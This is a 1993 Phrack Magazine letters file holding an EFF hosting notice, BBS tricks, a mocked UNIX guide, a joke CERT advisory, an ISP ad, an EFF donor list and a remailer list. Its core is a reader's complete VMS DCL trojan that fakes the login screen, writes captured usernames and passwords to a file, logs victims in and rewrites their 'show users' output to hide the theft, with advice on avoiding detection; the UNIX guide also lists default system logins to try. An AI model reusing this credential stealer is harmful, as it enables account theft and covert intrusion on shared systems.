AOH :: P43-02.TXT

Phrack Loopback Part I


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 2 of 27

                                Phrack Loopback
                                    Part I

****************************************************************************

                               COMING NEXT ISSUE

                         Van Eck Info (Theory & Practice)
   More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)
      HUGE University Dialup List  (Mail Us YOUR School's Dialup NOW!)
                          Neato Plans For Evil Devices
                               Gail Thackeray Gifs

*********************************** M A I L *********************************

Chris,

Craig Neidorf gave me these addresses as ways to reach you.  He tells me
that you are currently editing Phrack.  I hope you are well.

Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that
eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our
IUP connection, was charging us an extra $1,000 per month.  They did some
investigation at my request.  We determined that Phrack traffic alone was
responsible for over 40% of the total bytes transferred from the site over
the past year or so.  This is several gigabytes per month.  All in all, the
CuD archive, which contains Phrack, CuD, and other publications accounts
for 85% of our total traffic.  All of the email to and from EFF, Usenet
traffic, and other FTP (from the EFF archive, the CAF archive, and others)
constitutes about 15%.

EFF isn't going to be able to carry it any more because it is effectively
costing us $1,000 per month.  The fundamental problem is that Phrack is so
popular (at least as a free good) to cause real expense in transmission
costs.  Ultimately the users are going to have to pay the costs because
bandwidth (when measures in gigabytes anyway) isn't free.   The 12K per
year it costs us to carry Phrack is not something which EFF can justify in
its budget.  I'm sure you can understand this.

On July 1, eff.org moves from Cambridge to Washington, DC which is when I
expect we will stop carrying it.  I wanted to raise this issue now to let
you know in advance of this happening.

I have also asked Chris and Helen to talk to Brendan Kehoe, who actually
maintains the archive, to see whether there is anything we can do to help
find another site for Phrack or make any other arrangement which will
result in less loss of service.

Mitch



------------------------------------------------------------------------------
                Mitchell Kapor, Electronic Frontier Foundation
     Note permanent new email address for all correspondence as of 6/1/93
                              mkapor@kei.com


[Editor:  Well, all things must come to an end.  Looks like EFF's
          move to Washington is leaving behind lots of bad
          memories, and looking forward to a happy life in the hotbed
          of American politics.  We wish them good luck.  We also
          encourage everyone to join.........CPSR.

          In all fairness, I did ask Mitch more detail about the
          specifics of the cost, and he explained that EFF was paying
          flat rate for a fractional T-1, and whenever they went over
          their allotted bandwidth, they were billed above and beyond
          the flat rate.  Oh well.  Thank GOD for Len Rose.
          Phrack now has a new home at ftp.netsys.com.]

****************************************************************************

  I'm having a really hard time finding a lead to the Information
America Network.  I am writing you guys as a last resort.  Could
you point me in the right direction?  Maybe an access number or
something?  Thanks you very much.

[Editor:  You can reach Information America voice at 404-892-1800.
          They will be more than happy to send you loads of info.]

****************************************************************************

 To whom it may concern:
This is a submission to the next issue of phrack...thanks for the great
'zine!
----------------------------cut here-------------------------------
Greetings Furds:

 Have you ever wanted to impress one of those BBS-babes with your astounding
knowledge of board tricks?  Well *NOW* you can!  Be the life of the party!
Gain and influence friends!  Irritate SysOps!  Attain the worship and
admiration of your online pals.  Searchlight BBS systems (like many other
software packages) have internal strings to display user information in
messages/posts and the like.  They are as follows (tested on Searchlight BBS
System v2.25D):

        \%A  =  displays user's access level
        \%B  =  displays baud rate connected at
        \%C  =  unknown
        \%F  =  unknown
        \%G  =  displays graphics status
        \%K  =  displays user's first name
        \%L  =  displays system time
        \%M  =  displays user's time left on system
        \%N  =  displays user's name in format: First Last
        \%O  =  times left to call "today"
        \%P  =  unknown
        \%S  =  displays line/node number and BBS name
        \%T  =  displays user's time limit
        \%U  =  displays user's name in format: FIRST_LAST

All you gotta do is slam the string somewhere in the middle of a post or
something and the value will be inserted for the reader to see.

 Example:  Hey there chump, I mean \%K, you better you better UL or log
           off of \%S...you leach too damn many files..you got \%M mins
           left to upload some new porn GIFs or face bodily harm and
           mutilation!.

                      ----------------------------

Have phun!
Inf0rmati0n Surfer (& Dr. Cloakenstein)
SysOp Cranial Manifestations vBBS


[Editor:  Ya know, once a LONG LONG time ago, I got on a BBS and
          while reading messages noticed that a large amount of
          messages seemed to be directed at ME!!#  It took me
          about 10 minutes to figure it out, but BOY WAS I MAD!

          Then I added my own \%U message for the next hapless fool.
          :)  BIG FUN!]

****************************************************************************

-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-

                                 SotMESC

                   The US SotMESC Chapter is offering
                 Scholarships for the 1993 school term.

              Entries should be single-spaced paragraphs,
                  Double-spacing between paragraphs.

               The subject should center on an aspect of the
            Computer Culture and be between 20-30 pages long.

                           Send entries to:

                               SotMESC
                              PO Box 573
                         Long Beach, MS 39560

    All entries submitted will become the property of the SotMESC

-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-

****************************************************************************

           The Southwest Netrunner's League's
-----------------------------------------------------------------
  WareZ RoDeNtZ Guide to UNIX!!!!
-----------------------------------------------------------------

 Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)
 Assists  by:SysCon XIV       (The Ma'Bell Rapist)
      Iron Man MK 4a   (Things that make ya go boom)

 This file begs to be folded, spindeled,and mutilated.
 No Rights Reserved@1993

-----------------------------------------------------------------

  Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu

  Coming this September.... Shadowland, 68020... Watch this space.
-----------------------------------------------------------------

Part I(Basic commands)

Phile Commands: ls=List Philes
  more,page=Display Phile on Yo Terminal
  cp=Copy Phile
  mv=Move or Remove Philes
  rm=Remove Philes

Editor Commnds: vi=Screen Editor

Dirtory cmmnds: dir=Prints Directory
  mkdir=Makes a new Directory(also a VERY bad bug)
  rmdir=Remove a Directory
  pwd=print working directory

Misc. Commands: apropos=Locate commands by keyword lookup.
  whatis=Display command description.
  man=Displays manual pages online.
  cal=Prints calendar
  date=Prints the time and date.
  who=Prints out every one who is logged in
      (Well, almost everyone 7:^]  )

---------------------------------------------------------------

Part II(Security(UNIX security, another OXYMORON  7:^]  ))

If you are a useless wAReZ r0dEnT who wants to try to Netrun
a UNIX system, try these logins....

 root
 unmountsys
 setup
 makefsys
 sysadm
 powerdown
 mountfsys
 checkfsys


All I can help ya with on da passwords iz ta give you some
simple guidelines on how they are put together....

 6-8 characters
 6-8 characters
 1 character is a special character (exmpl:# ! ' & *)

-----------------------------------------------------------------

Well thats all fo' now tune in next time, same Hack-time
       same Hack-channel!!!


 THE TECHNOMANCER           I have taken all knowledge
   af604@FreeNet.hsc.colorado.edu
                                   to be my province

--
Technomancer
Southwest Netrunner's League

*****************************************************************

[Editor:  This is an example of what NOT to send to Phrack.
          This is probably the worst piece of garbage I've
          received, so I had to print it.  I can only hope
          that it's a private joke that I just don't get.

          Uh, please don't try to write something worse and
          submit it hoping to have it singled out as the
          next "worst," since I'll just ignore it.]

****************************************************************************

Dear Phrack,
   I was looking through Phrack 42 and noticed the letters about password
stealers. It just so happened that the same day I had gotten extremely
busted for a program which was infinitely more indetectible. Such is life.
I got off pretty well being an innocent looking female so it's no biggie.
Anyway, I deleted the program the same day because all I could think was
"Shit, I'm fucked". I rewrote a new and improved version, and decided to
submit it. The basic advantages of this decoy are that a) there is no
login failure before the user enters his or her account, and b) the
program defines the show users command for the user so that when they
do show users, the fact that they are running out of another account
doesn't register on their screen.
   There are a couple holes in this program that you should probably be
aware of. Neither of these can kick the user back into the account that
the program is running from, so that's no problem, but the program can
still be detected. (So basically, don't run it out of your own account...
except for maybe once...to get a new account to run it out of) First, once
the user has logged into their account (out of your program of course) hitting
control_y twice in a row will cause the terminal to inquire if they are
doing this to terminate the session on the remote node. Oops. It's really no
problem though, because most users wouldn't even know what this meant. The
other problem is that, if the user for some strange reason redefines show:

$show == ""

then the show users screen will no longer eliminate the fact that the account
is set host out of another. That's not a big deal either, however, because
not many people would sit around randomly deciding to redefine show.
   The reason I was caught was that I (not even knowing the word "hacker"
until about a month ago) was dumb enough to let all my friends know about the
program and how it worked. The word got spread to redefine show, and that's
what happened. The decoy was caught and traced to me. Enough BS...here's the
program. Sorry...no UNIX...just VMS.
                                            Lady Shade

I wrote the code...but I got so many ideas from my buddies:
Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice

------------------------------------------------

$if p1 .eqs. "SHOW" then goto show
$sfile = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The role of the dummy file in this program is to tell if the program !!!!
!!!! is being used as a decoy or as a substitute login for the victim. It !!!!
!!!! does not stay in your directory after program termination.           !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$sfile = f$search("sys$system:[ZJABAD_X]dummy.txt")
$if sfile .nes. "" then goto other
$open/write io user.dat
$close io
$open/write dummy instaar_device:[miller_g]dummy.txt
$close dummy
$wo == "write sys$output"
$line = ""
$user = ""
$pass = ""
$a$ = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! A login screen with a message informing someone of new mail wouldnt !!!!
!!!! be too cool...                                                      !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$set broadcast=nomail
$set message/noidenficitaion/noseverity/nofacility/notext
$on error then goto outer
$!on control_y then goto inner
$wo " [H [2J"
$wo ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! insert a fake logout screen here !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$wo "   ZJABAD_X     logged out at ", f$time()
$wo " [2A"
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the main body of the program. It simulates the system login !!!!
!!!! screen. It also grabs the username and password and sticks them in  !!!!
!!!! a file called user.dat                                              !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$outer:
$set term/noecho
$inquire a$/nopun ""
$inquire a$/nopun ""
$set term/echo
$c = 0
$c1 = 0
$c2 = 0
$inner:
$c2 = c2 + 1
$if c2 .eqs. 5 then goto speedup
$c = c + 1
$if c .eqs. 15 then goto fail
$if c1 .eqs. 3 then goto fail3
$user = "a"
$wo "Username: "
$from_speedup:
$set term/uppercase
$wo " [2A"
$read/time_out=10/prompt=" [9C " sys$command user
$if user .eqs. "a" then goto timeout
$set term/nouppercase
$if user .eqs. "" then goto inner
$set term/noecho
$inquire pass "Password"
$set term/echo
$if user .eqs. "ME" then goto done
$if pass .eqs. "" then goto fail
$open/append io user.dat
$write io user + " " + pass
$close io
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Sends the user into their account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$open/write io set.com
$write io "$set host 0"
$write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"
$write io pass
$close io
$@set
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control has been returned to your account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$write io " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Simulates a failure if the password is null, and also if the !!!!
!!!! username prompt has cycled through 15 times... This is what  !!!!
!!!! the system login screen does.                                !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail:
$c = 1
$c1 = c1 + 1
$wo "User authorization failure"
$wo " [1A"
$goto inner
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! After the third failure, the system usually sends the screen back !!!!
!!!! one step...this just handles that.                                !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail3:
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The system keeps a timeout check in the login. If a username is not !!!!
!!!! entered quickly enough, the timeout message is activated            !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$timeout:
$set term/nouppercase
$wo "Error reading command input"
$wo "Timeout period expired"
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! There is a feature in this program which sets the terminal to        !!!!
!!!! uppercase for the input of a username. This is wonderful for         !!!!
!!!! preventing program detection, but it does cause a problem. It slows  !!!!
!!!! the screen down, which looks suspicious. So, in the case where a     !!!!
!!!! user walks up tot he terminal and holds the return key down for a    !!!!
!!!! bit before typing in their username, this section speeds up the run  !!!!
!!!! considerably.                                                        !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$speedup:
$set term/nouppercase
$fast_loop:
$user = "a"
$read/time_out=1/prompt="Username: " sys$command io
$if user .eqs. "a" then goto from_speedup
$goto fast_loop
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is optional. There are many ways that you can implement !!!!
!!!! to break out of the program when you think you have gotten enough    !!!!
!!!! passwords. 1), you can sit down at the terminal and type in a string !!!!
!!!! for the username and pass which kicks you out. If this option is     !!!!
!!!! implemented, you should at least put in something that looks like    !!!!
!!!! you have just logged in, the program should not kick straight back   !!!!
!!!! to your command level, but rather execute your login.com. 2) You     !!!!
!!!! can log in to the account which is stealing the password from a      !!!!
!!!! different terminal and stop the process on the account which is      !!!!
!!!! running the program. This is much safer, and my recommandation.      !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$done:
$set broadcast=mail
$set message/facility/text/identification/severity
$delete dummy.txt;*
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is how one covers up the fact that the account which has !!!!
!!!! been stolen is running out of another. Basically, the area of the show!!!!
!!!! users screen which registers this is at the far right hand side.      !!!!
!!!! This section first writes the show users data to a file and alters    !!!!
!!!! it before it is written to the screen for viewing by the user. There  !!!!
!!!! may exist many forms of the show users command in your system, and    !!!!
!!!! you may have to handle each one differently. I have written only two  !!!!
!!!! manipulations into this code to be used as an example. But looking    !!!!
!!!! at how this is preformed should be enough to allow you to write your  !!!!
!!!! own special cases. Notice that what happens to activate this section  !!!!
!!!! of the program is the computer detects the word "show" and interprets !!!!
!!!! it as a procedure call. The words following show become variables     !!!!
!!!! passed into the program as p1, p2, etc. in the order which they       !!!!
!!!! were typed after the word show. Also, by incorporating a third data   !!!!
!!!! file into the manipulations, one can extract the terminal id for the  !!!!
!!!! account which the program is running out of and plug this into the    !!!!
!!!! place where the user's line displays his or her terminal id. Doing    !!!!
!!!! this is better that putting in a fake terminal id, but that is just a !!!!
!!!! minor detail.                                                         !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$show:
$show = ""
$show$ = ""
$length = 0
$ch = ""
$full = 0
$c = 0
$if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'
$if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit
$if p3 .eqs. "" then goto fallout
$goto full
$fallout:
$show 'p2' 'p3'
$exit
$ufull:
$show users/full/output=users.dat
$goto manipulate
$full:
$show$ = p3 + "/output=users.dat"
$show users 'show$'
$manipulate:
$set message/nofacility/noseverity/notext/noidentification
$open/read io1 users.dat
$open/write io2 users2.dat
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control_y must be dealt with here. If the user did happen to controlY !!!
!!!! there is a chance that the files users.dat and users2.dat could be    !!!
!!!! left in their directory. That is a bad thing as we are trying to      !!!
!!!! prevent detection :)                                                  !!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$on control_y then goto aborted
$user = ""
$test = ""
$long = ""
$ch = ""
$length = 0
$user = f$user()
$length = f$length(user) - 2
$user = f$extract(1,length,user)
$read_loop:
$read/end_of_file=eof io1 line
$test = f$extract(1,length,line)
$ch = f$extract (length+1,1,line)
$if (test .eqs. user) .and. (ch .eqs. " ") then goto change
$from_change:
$write io2 line
$goto read_loop
$eof:
$close io1
$close io2
$type users2.dat
$del users.dat;*
$del users2.dat;*
$show == "@instaar_device:[MILLER_G]findnext show"
$set message/facility/text/severity/identification
$exit
$change:
$if f$extract(50,1,line) .nes. "" then line = f$extract(0,57,line) + "(FAKE TERMINAL INFO)"
$goto from_change
$aborted:
$!if f$search("users.dat") .nes. "" then close io1
$!if f$search("users.dat") .nes. "" then delete users.dat;*
$!if f$search("users2.dat") .nes. "" then close io2
$!if f$search("users2.dat") .nes. "" then delete users2.dat;*
$close io1
$close io2
$delete users.dat;*
$delete users2.dat;*
$show == "@instaar_device:[MILLER_G]findnext show"
$set message/facility/text/severity/identification
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the section of the program which is executed in place of the !!!!
!!!! users login.com. It does grab their login and execute it to prevent  !!!!
!!!! suspicion, but there are a couple of hidden commands which are also  !!!!
!!!! added. They redefine the show and sys commands so that the user can  !!!!
!!!! not detect that he or she is riding off of another account.          !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$other:
$sh$ = "@instaar_device:[miller_g]findnext show"
$shline = "$sh*ow ==" + sh$
$logi = ""
$logi = f$search("login.com")
$if logi .NES. "" then goto Ylogin
$nologin:
$open/write io login2.com
$write io shline
$close io
$@login2
$delete login2.com;*
$exit
$ylogin:
$open/write io2 login2.com
$open/read io1 login.com
$transfer_loop:
$read/end_of_file=ready io1 line
$write io2 line
$goto transfer_loop
$ready:
$write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show""
$close io1
$close io2
$@login2
$delete login2.com;*
$exit


[Editor:  Thanks for the letter and program.  I wish I could bring
          myself to use a VMS and try it out.  :)  Always happy
          to get notice that somewhere out there a female reads
          Phrack.  By the way, "innocent female" is an oxymoron.]

****************************************************************************

To:   Phrack Loopback.
From: White Crocodile.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports"  is
 really cool invention and I (sorry for egoisthic "I") with  pleasure
 wasting time for his reading ( ex. my playboy time ). But  here  for
 some unknown reason appear equal  style,  and  all  loopback  remind
 something medium between "relations search" [Hello Dear Phrack, I am
 security expert of our local area, but when I looked  to  output  of
 "last" program (oh,yeah - "last" it is ...), I ocassionaly  under  -
 standed  what apparently someone elite  hacker  penetrated  into  my
 unpassworded  account!  But  how  he  knew  it???  I  need  to  talk
 with him! Please mail me at security@...] and "make yourself" [Yep.I
 totally wrote program which gets file listing from target  vicitim's
 home directory in current host. After that I decided  to  contribute
 it for You. I hope this will help. Here is the complete C code. "rx"
 permission in target's '$HOME' required.].
  Looking similar articles like "... off Geek!" and  various  reports
 which don't reacheds PWN. [CENSORED BY ME].
  Resulting from abovewritten reason and I let  myself  to  add  some
 elite (oops word too complex), some bogus and little deposit to Your
 lb. He written in classic plagiarize style.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                             *  *  *
Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what
it is horrible (don't read it please - this message to Bart),  but  I
doing it all the time (today already 3 month). I have not much time to
write, and here is the subject - I broke into  one  military  computer
and stole their mail about new security bug!!! l00k f3r |t:

                                - - -
          DDN & CERT
                            SPECIAL REPORT*
          Sun 3.x,4.1.x login flaw

Subject: The huge Sun 4.x login hole.(possibly Ulitix 3.0,BSD,AIX
                                       and many yet unknown systems)

Impact: Allow random intruders to gain "root" access.

Description:
   The huge security hole was there and waiting! Type:

     $ login root

   [ no option required ], and You are! All what You need to know its
   just root's password, but it (pw), sure, can be easily obtained from
   real root, by asking him (root). Ex - "$ talk root"

Possible fix until copyrighted patch come out:

     #rm /usr/bin/login
     #cp /usr/games/fortune /usr/bin/login

If you believe that your system has been compromised, contact CERT CC. Call
our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in  time
of "Silence of the Lamb"), leave Inet address of your system and  number of
private credit card.
                               - - -

* Report not will be printed in cert advisories in this form, becouse FBI
   need remove all hints and tips, and make him useless to intruders.

DISCLAIMER: Above document written by CERT, DDN and FBI -
                                      all pretension to them.

Thanks to gr*k (I can't write his full name for security reasons),roxtar,
y0,Fidelio,2 scotts from Santafe,KL (He not have attitude  towards  this
mail,but I included him for polite since he reserved tickets for me  to
SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for
hints to me, what this bug really exist (Yep, before I stoled report).

 - Write You later - anonymous.

P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK
and sure Erik Bloodaxe. And also - IF after E911 incident you are more
carefully, feel free to replace "stole" to "got" (when you'll post it),  and
do not forget to add "reprinted with permission".

 - Sincerely, anonymous.

----------------------------------------------------------------------

[Editor:  More indications that we will all be raided by the DEA
          more often than the FBI in coming years.]

*****************************************************************************


 "Since my probation status forces me to be adamant about this. Illegal
  activities on Netsys cannot and will not be tolerated. Prison sucked."

                                    - Len Rose

 06/6/93

 NETSYS COMMUNICATION SERVICES  Palo Alto, California

 Netsys is a network of large Sun servers dedicated to providing
 Internet access to individuals and corporations that need solid,
 reliable Internet connectivity.  Netsys is at the hub of major
 Internet connectivity.

 Netsys is a system for professionals in both the Internet and Unix
 community. The public image is important to us. Illegal activities
 cannot be tolerated.

 Netsys has every feature you could possibly need.

 Netsys is lightly loaded, extremely reliable and dedicated to providing
 full time 24 hour Internet access.

 Support: 24 hour emergency response service.

 Dialups: Palo Alto area, High Speed (V.32 and PEP)

 Private Accounts: $20 monthly ( with file storage capacity of 5 megabytes)

                   $1 per megabyte per month over 5 megabytes.

 Commercial Accounts: $40 monthly (file storage capacity of 10 megabytes)
                      $1 per megabyte per month over 10 megabytes.

 Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic
            newsgroups, and including all foreign newsgroups.

               SPECIAL FEATURES THAT NO ONE ELSE CAN PROVIDE

 Satellite Weather: Netsys has available real time satellite weather
                    imagery. Images are available in gif, or Sun raster
                    format. Contact us for NFS mirroring, and other special
                    arrangement. These images are directly downlinked from
                    the GOES bird. Contact Steve Eigsti (steve@netsys.com)

 Satellite Usenet: Netsys is offering Pagesat's satellite newsfeed service

                   for large volume news distribution. Members of Netsys
                   can obtain substantial discounts for the purchase and
                   service costs of this revolutionary method of Usenet news
                   distribution.  Both Unix and MS Windows software available.
                   Contact (pagesat@pagesat.com) for product information.

 Paging Services: Netsys is offering Pagesat's Internet to Pager mail service.
                  Members of Netsys can obtain critical email to pager
                  services. Pagesat has the ability to gateway any critical
                  electronic mail to your display pager.

                      Leased Line Internet Connections

  Pagesat Inc. offers low cost 56k and T1 Internet connections all over the
  United States. Since Pagesat is an FCC common carrier, our savings on
  leased lines can be passed on to you. For further information, contact
  Duane Dubay (djd@pagesat.com).

 We offer other services such as creating domains, acting as MX
 forwarders, and of course uucp based newsfeeds.

 Netsys is now offering completely open shell access to Internet users.
 For accounts, or more information , send mail to netsys@netsys.com

 Netsys will NEVER accept more members than our capacity to serve.

 Netsys prides itself on it's excellent connectivity (including multiple T1's,
 and SMDS), lightly loaded systems, and it's clientele.

 We're not your average Internet Service Provider. And it shows.
--------------------------------------------------------------------
[Editor:  We here at Phrack are forever in debt to Mr. Len Rose for
          allowing us to use ftp.netsys.com as our new official FTP
          site after getting the boot off EFF.  It takes a steel
          set of huevos to let such an evil hacker publication
          reside on your hard drive after serving time for having
          dealings with evil hackers.  We are STOKED!  Thanks Len!
          Netsys is not your average site, INDEED!]

****************************************************************************

Something Phrack might like to see:

The contributors to and practices of the Electronic Frontier Foundation
disclose quite accurately, just who this organization represents.  We
challenge the legitimacy of the claim that this is a "public interest"
advocate.  Here is a copy of their list of contributors:

[FINS requested the Office of the Attorney General of the Commonwealth of
Massachusetts to provide us with a list of contributors of over $5000, to
the Electronic Frontier Foundation, required by IRS Form 990.  Timothy E.
Dowd, of the Division of Public Charities, provided us with a list (dated
January 21, 1993), containing the following information.  No response was
given to a phone request by FINS directly to EFF, for permission to inspect
and copy the most current IRS Form 990 information.]



                  ELECTRONIC FRONTIER FOUNDATION, INC.
              IRS FORM 990. PART I - LIST OF CONTRIBUTIONS


NAME AND ADDRESS OF CONTRIBUTOR       CONTRIBUTION
                                    DATE      AMOUNT

Kapor Family Foundation
C/O Kapor Enterprises, Inc.
155 2nd Street
Cambridge, MA 02141                Var       100,000

Mitchell D. Kapor
450 Warren Street
Brookline, MA 02146                Var       324,000

Andrew Hertzfeld
370 Channing Avenue
Palo Alto, CA 94301                12/12/91    5,000


Dunn & Bradstreet
C/O Michael F. ...
1001 G Street, NW Suite 300 East
Washington, DC 20001               02/12/92   10,000

National Cable Television
1724 Massachusetts Avenue, NW
Washington, DC 20036               02/18/92   25,000


MCI Communications Corporation
1133 19th Street, NW
Washington, DC 20036               03/11/92   15,000

American Newspaper Publishers
Association
The Newspaper CTR
11600 Sunrise Valley
Reston, VA 22091                   03/23/92   20,000

Apple Computer
20525 Mariani Avenue MS:75-61
Cupertino, CA 95014                03/23/92   50,000

Sun Microsystems, Inc
c/o Wayne Rosing
2550 Garcia Ave
Mountain View, CA 94043-1100       04/03/92   50,000

Adobe Systems, Inc.
c/o William Spaller
1585 Charlestown Road
Mountain View, CA 94039-7900       04/16/92   10,000

International Business Systems
c/o Robert Carbert, Rte 100
Somers, NY 10589                   05/07/92   50,000

Prodigy Services Company
c/o G. Pera...
445 Hamilton Avenue
White Plains, NY 10601             05/07/92   10,000

Electronic Mail Associates
1555 Wilson Blvd. Suite 300
Arlington, VA 22209                05/13/92   10,000

Microsoft
c/o William H. Neukom
1 Microsoft Way
Redmond, VA 98052                  06/25/92   50,000

David Winer
933 Hermosa Way
Menio Park, CA 94025               01/02/92    5,000

Ed Venture Holdings
c/o Ester Dvson
375 Park Avenue
New York, NY 10152                 03/23/92   15,000

Anonymous                          12/26/91   10,000

Bauman Fund
c/o Patricia Bauman
1731 Connecticut Avenue
Washington, DC 20009-1146          04/16/92    2,500

Capital Cities ABA
c/o Mark MacCarthy
2445 N. Street, NW Suite 48
Washington, DC 20037               05/04/92    1,000

John Gilmore
210 Clayton Street
San Francisco, CA 94117            07/23/91    1,488
                                   08/06/91  100,000

Government Technology              10/08/91    1,000

Miscellaneous                      04/03/91      120

Apple Writers Grant
c/o Apple Computer
20525 Mariani Avenue               01/10/92    15,000


[Editor:  Well, hmmm.  Tell you guys what:  Send Phrack that
          much money and we will give up our ideals and move to
          a new location, and forget everything about what we
          were all about in the beginning.  In fact, we will turn
          our backs on it.  Fair?

          I was talking about me moving to Europe and giving
          up computers.  Don't read anything else into that.  Nope.]

****************************************************************************

-----BEGIN PGP SIGNED MESSAGE-----

Q1: What cypherpunk remailers exist?

A1:

 1: hh@pmantis.berkeley.edu
 2: hh@cicada.berkeley.edu
 3: hh@soda.berkeley.edu
 4: nowhere@bsu-cs.bsu.edu
 5: remail@tamsun.tamu.edu
 6: remail@tamaix.tamu.edu
 7: ebrandt@jarthur.claremont.edu
 8: hal@alumni.caltech.edu
 9: remailer@rebma.mn.org
10: elee7h5@rosebud.ee.uh.edu
11: phantom@mead.u.washington.edu
12: hfinney@shell.portal.com
13: remailer@utter.dis.org
14: 00x@uclink.berkeley.edu
15: remail@extropia.wimsey.com

NOTES:
#1-#6  remail only, no encryption of headers
#7-#12  support encrypted headers
#15  special - header and message must be encrypted together
#9,#13,#15 introduce larger than average delay (not direct connect)
#14  public key not yet released

#9,#13,#15      running on privately owned machines

======================================================================

Q2: What help is available?

A2:

Check out the pub/cypherpunks directory at soda.berkeley.edu
(128.32.149.19).  Instructions on how to use the remailers are in the
remailer directory, along with some unix scripts and dos batch files.

Mail to me (elee9sf@menudo.uh.edu) for further help and/or questions.

======================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.2

